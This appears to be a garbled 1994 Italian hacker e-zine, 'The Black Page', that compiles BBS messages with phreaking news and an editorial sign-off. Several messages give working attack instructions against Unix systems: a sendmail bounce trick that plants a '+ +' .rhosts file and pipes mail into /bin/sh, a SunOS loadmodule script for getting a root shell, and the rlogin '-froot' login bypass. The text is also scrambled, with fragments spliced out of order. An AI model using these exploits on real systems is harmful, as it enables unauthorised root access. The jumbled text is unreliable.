Integrity Voice: (408) 922-6526 Internet: ddrew@Tymnet.COM Fax : (408) 922-8870 >> MCIMAIL: Dale_Drew/644-3335 # call these numbers :P Msg #1035 Monday. NO MINIMUM. Additional information about this incident can be obtained bycontacting me directly.muc.61.0. Apassword was left as well. they set the service frely for you.51 --Hey do you smell what I am smelling? he. 1994 11:46 CET From: The. you pay for what you really use NO ENTRY FEES. This works for voice as well as for faxes and modem communications. pay with your credit card possible destinations list and detailed prices available on request contact Nicolas Laurance (33-1) 40.

greenie. June 12..iastate. June 25. Msg #210 Thursday.unit.edu irc...US.de (Techno Music) writes: > > > > > > > about the smtp bug of the sun os unix.columbia.greenie.184.muc.calpoly. . 1994 17:11 CET From: Elmar. 1994 09:19 CET From: Dark. post them :) Aky Msg #1005 Sunday.indiana. post others if you got them! Subject: Re: IRC some irc servers: irc.ac.muc.edu copper.oc..de (Dark Side) To: All%bbs@sectec.bu. harp.to discover if this bug is patched i ive the instruction vrfy decode.de (All) Subject: inet sites hello..edu csz.edu polaris.... i am thinking to make a list of most known servers.ORG .greenie.6_prerel_1/Demo_filer/ 192.edu irc-2.1 128.Music%bbs@sectec..ctr....1 /UniOn-students/incoming/" " most are pc/amiga/mac/etc..il hermes.31.de (Elmar Bartel) Subject: Re: SMTP BUG Techno.aix.edu and a buncha others.acc.muc.1.muc. July 7.EDU irc.UnderNet.mit..de (The Aky) Subject: Re: IRC yeah.mit.etc.but is possible that the system answer the user exist and the bug is patched too? this couse i found a system that say the user exist but i can't use the bug.Msg #201 Saturday..Aky%bbs@sectec.technion. (ftp) uranus.181..Virginia. when the system give this message: user unknown the bug is patched.greenie.MA.Bartel%bbs@sectec.greenie.no/pub/Version_1. check me if you need more. 1994 02:13 CET From: The.ucs.ifi. but here are some interesting sites.Side%bbs@sectec.edu poe...muc.com Boston. dunno if it was asked.

The public should now realise that if the serial numbers (ESNs) are changed they cannot be connected to the network and are therefore valueless. UK trade Mag.. Well. :) 'from: bin' and 'to: decode' will uudecode your message to /bin/. 'to: bin'. e. 'Return-Receipt-To: nowhere'.de (Davex Davex) To: All%bbs@sectec. The move follows industry-wide discussions between BABT and Oftel.. When bouncing mail all but the latest versions of sendmail will set a flag. Then make the last ten (including the line with the '. I don't have to tell you what to do with an '+ +' . e.greenie.') a shell script. even if this meant mailing it to a program. There we go." **************************** Tell me about it!! Does this mean more fones to phreak with?? Australia ~~~~~~~~~ .cut here ---#!/bin/sh echo HELLO THERE >/tmp/test # # # These comments pad the message to a length of ten lines # # # # ---. It is simply an alias which pipes mail to uudecode. ~~~~~~~~~~~~~~~ BABT approval on new TACS cellphones will in future include a clause which invalidates the approval if a phone's ESN is altered.rhosts et voila. you guess what this does.rhosts.de (All) Subject: newz Some Quotes from Mobile & Cellular. Re-chipping Ban.muc. Use a 'from: bin' and make up a uuencoded file '/bin/.Davex%bbs@sectec. the networks. June 11. make the last lines of your mail body something along the lines of ---.greenie. g. and it will be returned to '/usr/ucb/tail /bin/sh'. g. 'tail' keeps only the last ten lines of your mail and pipes it to /bin/sh.. dealers and the FCS Cellular Service Providers Group. which forces the mail to be sent. Get the point? :) -Elmar Msg #94 Saturday. do I? :) The smtp bug is about something completely different. manufacturers.The decode doesn't have anything to do with a smtp bug.rhosts' which contains one single line '+ +'. use something like 'from: /usr/ucb/tail /bin/sh'.muc. Create a header which will cause the mail to bounce. Thus.cut here ---What happens when your mail is being delivered? It will bounce. 1994 02:17 CET From: Davex. Peter Edwards of the FCS group said: "ESN re-chipping continues to fuel the rise in mobile phone theft and is costing our members millions of pounds every year in stolen airtime and time-consuming administration.

1U ? > Maxwell Benneth! Still around.de (Elmar Bartel) Subject: Re: loadmodule Maxwell.muc.de (Jerome X) Subject: Re: Linux Nexus.de (All) Subject: loadmodule Here's script that exploits loadmodule on SunOSes . it will complain that it cannot find the kernel module 'x'. since this script is executed with root privileges just write your own chmod and set your path to '.DaveX Msg #1099 Thursday. :) -Elmar Msg #1114 Monday... but I never found a site with this bug.3.de (Maxwell Benneth) writes: > Anyone played with /usr/openwin/loadmodule on 4.. The Optus GSM network..greenie.GSM went live in Australia on May 20th after two months of trials. in many versions the username '-froot' will be passed to the login program by the daemon and login will accept this to be the '-f' flag with the argument 'root'..de (Phantom Lord) To: All%bbs@sectec. uses infrastructure by Nortel Matra Cellular.Lord%bbs@sectec. August 11. how embarassing. the second 'x' stands for a shell script. then replace the first 'x' with a valid device.muc. which will be available in all Australian capitals by Christmas. :) loadmodule executes scripts with a uid of 0.greenie.Benneth%bbs@sectec. 'cat' it and you'll see that there is a 'chmod' in there (used to chmod the device node created by mknod) which doesn't have a full path like '/bin/chmod'.muc.6%bbs@sectec.... 1994 14:44 CET From: Jerome. try 'loadmodule x x'.greenie. i use the 'evq' device. heard of it.greenie.greenie. August 15..de (Nexus 6) writes: > Doen anybody know some bugs on linux?! the -froot bug maybe.. August 11..muc.. **************************** More newz as it comez in. . also works on many AIXes. then use the corresponding 'evq' script. cannot remember where those are located. 1994 02:43 CET From: Phantom.' > Doen anybody know some bugs on linux?! try a 'rlogin [machine] -l -froot'. the same bugcould be abug in AIX machines J-X Msg #1101 Thursday. at the loginprompt just enter -f root or -froot or sumthing . only '-f root' should be accepted here..Bartel%bbs@sectec.X%bbs@sectec.muc. 1994 23:24 CET From: Elmar.1.muc.. thus loadmodule will complain it cannot find the script and give you the full path.greenie...

it provides u free telnet access and IRC . August 29.29.muc.greenie.greenie.de (All) Subject: fsp site Decent FSP site.greenie.greenie.so why did they bust it? FidoNet boards are legal as well and have been busted anyway .de (Massimo Baga) Subject: Re: IRC Ganja. August 8.o evqload Msg #1125 Tuesday.in Italy.edu and there you go. $path ) cat > ld << EOF /bin/sh EOF chmod a+x ld loadmodule sd. August 28. 1994 21:18 CET From: Speed.! Yes .de (Ganja Man) writes: u should check for +1 515 945 7000..206.Power%bbs@sectec. AAAAHAHAHAHAHAHAHHHAHAHAHHAHAHAHAH SCSI ha sempre ragione :) ] Msg #233 Sunday.. 1994 21:47 CET From: Bayern.de (Speed Demon) To: All%bbs@sectec.greenie. logic doesn't count! [N.1%bbs@sectec. Massimo Msg #29 Monday..set path = ( .bu. 1994 08:48 CET From: Massimo.R. Speriamo che vi siano piaciute !!! .de (The Aky) Subject: Re: IRC >I need a workin dialin with an IRC-account .muc.Music%bbs@sectec. Physical Plant #5 128..muc.muc.greenie..de (Bayern Power) Subject: Re: sam Techno.greenie. only for IRC.muc.de (Cyber 1) writes: > The italian SAMANTHA chat system has been busted by italian police. August 23..muc. iftp irc client from cs. Cheers. s Msg #234 Monday.Man%bbs@sectec.Demon%bbs@sectec.11 12321 Pc and Mac wares ============================================================================ Beh.de (Techno Music) writes: > > > > > Cyber.. > bye samantha didn't was an hacking system.muc.greenie.muc.Baga%bbs@sectec. fine delle stronzate.Aky%bbs@sectec. 1994 18:51 CET From: The.d.

chiunque puo' andare li' e prenderseli. in ogni caso prendetela per com'e'. mi avete detto "ma se scrivo solo io allora non se ne fa niente" oppure "ma io non voglio sputtanare quello che so" e cazzate del genere.THE END COMMIATO ======== Bene.Settembre 1994 .+++ATH j)(/ kjk=# OK ----------------------------------------------------------------The Black Page . adesso l'avete visto. Ma rappresenta piu' che altro un nostro ESPERIMENTO.) Si ringrazia tacitamente Sxs per la "Mucca che caga" di IRC . E' solo un tentativo di tirare fuori qualcosa di buono.edu H ___\__/\---/--. Questa magazine e' aperta a ogni tipo di cosa che riguardi il ns mondo telematico.INDIRIZZI EMAIL VALIDI : H ============================================================================ H H \ / T H H Internet : ay146@freenet. o per darci dei suggerimenti. Questo numero. che e' lamer. Settembre 1994 . E POI. di farci delle domande. Speriamo che questa strana rivista vi sia piaciuta. di esprimere le vs opinioni sulla rivista. non ha niente di illecito al suo interno. perche' a noi cosi' va bene.H C H H H / \ T O H H QSD : Mailbox "DUPREES PARADISE" H / \ M H H H H H Videotel : Arkimede *52181# H TELECOM H H NUA 2551604400 H SE LA CONOSCI H H Lasciare CPE all'user "DUPREE'S" H LA EVITI H H H H ============================================================================ THE BLACK PAGE . almeno credo. STRONZACCI.G E H H Scrivere a "Dupree's Paradise" H _____//\-\----. beh.hsc. VOI. perche' basta un po' di fantasia per tirare fuori cose interessanti. Quindi. e NON ROMPETECI I COGLIONI dicendo cazzate. per vedere se dopo aver letto ste cazzate qualcuno si decidera' ad aiutarci. di mandarci dei vs articoli. dal nostro paese. che fa schifo.I L H H Cybernet : 65:1200/1 DECODER BBS H ______//------.F E H H H _____\/\-/----. Bene. SI. questa e' proprio la fine. fatevi sotto !!! Se avete intenzione di collaborare. Contiene dati prelevati da BBS e CHAT di vario tipo. SI. e voi. che finora sembra solo popolato da stronzi :) vabbe' va. CAZZATE.Numero 0 . CAZZO !!! Ho cercato per MESI dei collaboratori. FATELO !!! E SUBITO !!! :) ============================================================================ H THE BLACK PAGE . scrivete agli indirizzi EMAIL sotto-riportati. Molti avrebbero prima di tutto voluto vedere di che si trattava per poi decidere se collaborare o no.In questo numero hanno collaborato : ----------------------------------------------------Dupree's Paradise Ice MC Ace Hitman Italy Redattore capo Redattore quasi capo anche lui :) Corrispondente dagli Esteri :) The K00l Unix guy .Numero 0.colorado. o anche semplicemente per INSULTARCI.

Luc Pac e tutto lo staff di Decoder BBS Lo staff di One Man Crew Per qualsiasi messaggio utilizzate la seguente chiave PGP 2.3a mQCNAi4ineEAAAEEAKT5tLs4cMmniPjJE1Xv0D0/sbxTKPCY+f60c7px/xXUDObv 47fnFscT7lOZ7TeCJVo8m7qfj6HqiqSLuRMTNeAEcTUvUYoa7I+mNceL3rVgkqid qf3RP0av7AFCfICSnzzA/KD3M73I0SBeAt3Mple6EeJ0C7sA+o2626Mw2H/BAAUR tNdEdXByZWUncyBQYXJhZGlzZSA8UVNEIE1ieCA6ICJEVVBSRUVTIFBBUkFESVNF Ij4gICAgIDxGaWRvbmV0IDI6MzMxLzM2OT4gICAgICAgIDxheTE0NkBGcmVlbmV0 LkhzYy5Db2xvcmFkby5FZHU+ICAgICAgICAgICAgICAgICAgICAgPEN5YmVybmV0 IDY1OjEyMDAvMT4gICAgICAgPER1cHJlZSdzLlBhcmFkaXNlJWJic0BTZWN0ZWMu R3JlZW5pZS5NdWMuRGU+ICAgICAgICA6KYkAlQIFEC4in4nJtVamMFAlIQEBFu8E AKLEfKdOjF+rV5gBg1/KFQ//CHsfYS4FNd3qvbRx6PEUIy3NJ4+YSpGAsPgxNyGg gVv7QEHHeDlRwgrSkVvM2AaIwYWxZqs2/X09Igy2QowpfTduVppN0mzGyb2/ug5k PyYA/rsriHxmciMjAUjcptv+7WYVx73q7PmbSTUzYjQA =pvb/ -----END PGP PUBLIC KEY BLOCK----@BEGIN FILE_ID.È» ÇÄÄÄÄÄÄÄÄÄÄpÄrÄeÄsÄeÄnÄtÄsÄÄÄÄÄÄÄÄÄĶ º The First Italian ------------=== º º ===----------.º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ @END FILE_ID.3a : ================================================================ -----BEGIN PGP PUBLIC KEY BLOCK----Version: 2.DIZ =================================NO CARRIER================================= .----------------------------------------------------------Si ringraziano i seguenti esseri.Settembre 1994 .Cyberpunk Magazine º ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ ÇÄ The Black Page Ķ º* Issue 00 .September 1994 *º ÇÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ º La 1a rivista telematica ITALIANA º º di CYBERPUNK e CONTROINFORMAZIONE º º The Black Page . reali o virtuali : ---------------------------------------------------Ace Hitman Italy I Vax Brothers Lo staff di Arkimede SevenUp e tutti quanti su SECTEC BBS Black Jack Agora' Telematica Gomma.Numero 00 -.º º .DIZ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ɼ * Dupree's Paradise * & -IceMC.

Sign up to vote on this title
UsefulNot useful